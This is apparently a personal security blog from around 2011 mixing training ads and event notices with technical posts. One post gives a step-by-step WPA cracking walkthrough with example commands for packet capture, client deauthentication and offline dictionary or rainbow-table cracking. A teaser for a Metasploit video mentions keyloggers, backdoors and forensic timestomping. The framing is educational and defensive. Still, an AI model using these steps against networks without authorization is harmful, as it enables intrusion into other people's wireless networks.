Darknet Consulting

Many of you have asked for the presentation Digital Forensics vs Digital Anarchy that I have been showing at various colleges.

Here are the important screens from those slides:

Hey Everyone,

I will be doing a show with the ISSA folks here in Michigan, check out the info here:

http://northoakland.issa.org/node/18

Hey Michiganders!

Why travel when you can get the training you need at a savings you can use, right in your local community?

Now you can save thousands on your training budget and still experience live SANS training right here in Detroit with a training class from the SANS Mentor Program. This is the most affordable live, in person training we have to offer.

With learning spread out over the course of several weeks, you can understand and digest this popular SANS course at a pace designed for busy working professionals such as yourself. This class will be led by Black Belt Mentor Mark Bennett. Mark brings over a decade of practical experience to the classroom, and will work hands-on with each and every student in this smaller classroom environment.

And as our way of saying thank you for training locally, you will receive a $200 gift card from Amazon.

**Enter Promo Code: MAG1211 when registering to receive your $200 Amazon Gift Card.**

Security 504: Hacker Techniques, Exploits & Incident Handling

(http://www.sans.org/info/84174)

Start Date – January 10, 2012 and runs weekly until March 13th.

Class Time: 6:30PM – 8:30PM

A Sampling of Topics Covered:

- The step-by-step approach used by many computer attackers

- The latest computer attack vectors and how you can stop them

- Proactive and reactive defenses for each stage of a computer attack

- Hands-on workshop addressing scanning for, exploiting, and defending systems

- Strategies and tools for detecting each type of attack

- Attacks and defenses for Windows, Unix, switches, routers and other systems

- Application-level vulnerabilities, attacks, and defenses

- Developing an incident handling process and preparing a team for battle

- Legal issues in incident handling

- Recovering from computer attacks and restoring systems for business

For complete event details visit http://www.sans.org/info/84174

**Enter Promo Code: MAG1211 when registering to receive you $200 Amazon Gift Card. **

**Offer ends December 31, 2011**

It is interesting how many people believe that their wireless is secure because they are using WPA. Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table.  The cool thing is I bought an ALFA usb antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless car in promiscuous mode)

kismet -c wlan0

• close console window to see collection of packets
• use alt + k to get to top pull down menu’s, turn on ability to see type of access points bsid and guess at IP address, channel #

Cntrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c <channel number> –bssid <bssid> -w <Access Point Name> wlan0

Example:

airodump-ng -c 9 –bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0  * Note D-Link-01.cap is where the capture of all traffic will go

Now open another window as we need to force a re-conect from the target (see the Note below)

aireplay-ng <deauth> <send amt of deauth pkts> -a <bssid> -c <station #> wlan0

Example:

airepley-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see at the top of the airodump window a wpa re-key, capture some traffic and exit you will have captured all the trafic in the D-Link01.cap file.

Part III

 Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow)

cowpatty -r <capture file> -d <hashfile> -s <essid>

Example:

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

 If using Dictionary words:

cowpatty -r <capture file> -f <dictionary file> -s <essid>

Example:

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note : If you are in an environment that has alot of cell phones like the iphone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless ethernet card has a wake-up when the screen is activated. So you don’t need to send de-auth all you got to do is hang around long enough for someone to touch their Iphone or whatever cell and have it wake up it’s wireless and re-auth to the network, in other words there is the weakest link! —  LOL!

Happy Cracking

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY—I’m Out!

I wanted to let everyone know I will be speaking at the local Michigan Chapter of HTCIA. As always my events are live so you will get to see a live demonstration of how to create a forensic image of the shadow volume in Vista for use in analysis in the SANS SIFT Workstation. 

February 9th, 2011 from 10:00 AM to 12:00 noon at the Troy Police Department, 500 W Big Beaver Rd, Troy, MI  48084 Check out the MIHTCIA website here: http://www.mihtcia.org/

As always everything I do is live, I never give death by powerpoint, if I can’t demonstrate it live, I don’t do it.

“Be good, be safe, if you are going to hack …hack legally and responsibly…I’m Out”

Hey everyone I just subscribed to an awesome magazine. Digital Forensics. Check it out here : http://digitalforensicsmagazine.com/

Hello Again

People have been asking me to show some basic metasploit and how you use it. I recently did a security show for the Michigan ISSA folks where we showed everyone how to use it. So I figured I would re-hash that as well as build on it to give you a good feel for what you can do. So I created a video (see video on the right side of the blog) and in the video I show you how to own a box, as well as different commands you can use and how they work. We will use the aurora exploit, with (and without) the meterpreter, keylogging, victim enumeration, timestomp (to mess with a forensic timeline), backdoors, and more!

*Be good, be safe, if you are going to hack, hack legally and responsibly…I’m Out!

~Mark Bennett

Thanks to all who attended the recent ISSA Netwars Challenge.

Read More >>

Hello Again! Been a while since I blogged but the Vector 2 show, it’s preparation, was quite a bit to do.  Those of you who saw us at vector 2 remember that formatting a disk Does Not remove the data. (See the video on the vector 2 Data Recovery) during the video Jack and I talk about wiping things to NIST standard. A great way to do this is through linux(unix) with a simple dd command.

Today I going to talk about another way to wipe data. This is a Micorsoft tool. It is using a command called sdelete (Secure Delete). This is part of the sysinternals and can be downloaded directly from microsoft. SDelete implements the Department of Defense clearing and sanitizing standard DOD 5220.22-M, to give you confidence that once deleted with SDelete, your file data is gone forever.

You can use sdelete to delete a file like the normal delete command, however, this does not delete the file name.  However I am talking in this write up about zero’ing a drive.

Now it is important to remember we are dealing with the Data Layer unallocated space of a drive. The Meta-Data would still be there depending upon time. So if you format the drive (wiping the meta-data) then use sdelete (as you plug the drive into a usb cable) with a “-c” flag to zero the free space you will have effectively wiped a drive. After running strings, and taking a sample image of the disk you will find that the disk is full of null’s (zero).

Well that is the tip for now, stay tuned we got some exciting things coming up, untill then be good, be safe, hack legally and responsively…I’m out!